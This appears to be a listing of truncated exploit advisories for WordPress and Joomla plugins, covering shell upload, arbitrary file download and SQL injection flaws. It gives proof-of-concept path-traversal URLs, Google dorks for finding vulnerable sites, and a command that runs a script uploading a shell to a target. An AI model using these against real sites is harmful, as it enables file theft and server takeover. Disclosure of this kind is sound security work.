Vuln. discovered

WordPress WP Symposium Shell Upload Vulnerability

___ ___ __ | Y .-----.----.--| .-----.----.-----.-----.-----. |. | | _ | _| _ | _ | _| -__|__ --|__ --| |. / \ |_____|__| |_____| __|__| |_____|_____|_____| |: | |__| |::.|:. | `--- ---' ___ ___ _______ _______ __ | Y | _ |______| _ .--.--.--------.-----.-----.-----|__.--.--.--------. |. | |. 1 |______| 1___| | | | _ | _ |__ --| | | | | |. / \ |. ____| |____ |___ |__|__|__| __|_____|_____|__|_____|__|__|__| |: |: | |: 1 |_____| |__| |::....

WordPress Ajax Store Locator Arbitrary File Download Vulnerability

###################### # Exploit Title : WordPress Ajax Store Locator <= 1.2 Arbitrary File Download # Exploit Author : Claudio Viviani # Vendor Homepage : http://codecanyon.net/item/ajax-store-locator-wordpress/5293356 # Software Link : Premium # Dork Google: inurl:ajax-store-locator # index of ajax-store-locator # Date : 2014-12-06 # Tested on : Windows 7 / Mozilla Firefox # Linux / Mozilla Firefox ###################### # PoC Exploit: http://TARGET/wp-content/plugins/ajax-store-locator-wordpress/sl_file_download.php?download_file=[../../nomefile] or http://TARGET/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/sl_file_download.php?download_file=[../../nomefile] "download_file" variable is not sanitized. ##################### Discovered By : Claudio Viviani http://www....

WordPress wpDataTables 1.5.3 and below Unauthenticated Shell Upload Vulnerability

claudio@backbox3:~/claudio$ python wpdatatables_shell_up.py -t http://10.0.0.67/wordpress -f shell.php ___ ___ __ | Y .-----.----.--| .-----.----.-----.-----.-----. |. | | _ | _| _ | _ | _| -__|__ --|__ --| |. / \ |_____|__| |_____| __|__| |_____|_____|_____| |: | |__| |::.|:. | `--- ---' ___ ___ ______ __ _______ __ __ | Y .-----| _ \ .---.-| |_.---.-| .---.-| |--| .-----.-----. |. | | _ |. | \| _ | _| _ |....

WordPress wpDataTables SQL Injection Vulnerability

###################### # Exploit Title : WordPress wpDataTables 1.5.3 and below SQL Injection Vulnerability # Exploit Author : Claudio Viviani # Software Link : http://wpdatatables.com (Premium) # Date : 2014-11-22 # Tested on : Windows 7 / Mozilla Firefox Windows 7 / sqlmap (0.8-1) Linux / Mozilla Firefox Linux / sqlmap 1.0-dev-5b2ded0 ###################### # Description Wordpress wpDataTables 1.5.3 and below suffers from SQL injection vulnerability "table_id" variable is not sanitized. File: wpdatatables....

Joomla HD FLV Player Arbitrary File Download Vulnerability

Info # Exploit Title : Joomla HD FLV 2.1.0.1 and below Arbitrary File Download Vulnerability # # Exploit Author : Claudio Viviani # # Vendor Homepage : http://www.hdflvplayer.net/ # # Software Link : http://www.hdflvplayer.net/download_count.php?pid=5 # # Dork google 1: inurl:/component/hdflvplayer/ # Dork google 2: inurl:com_hdflvplayer # # Date : 2014-11-11 # # Tested on : BackBox 3.x/4.x # # Info: # Url: http://target/components/com_hdflvplayer/hdflvplayer/download.php?f= # The variable "f" is not sanitized. # Over 80....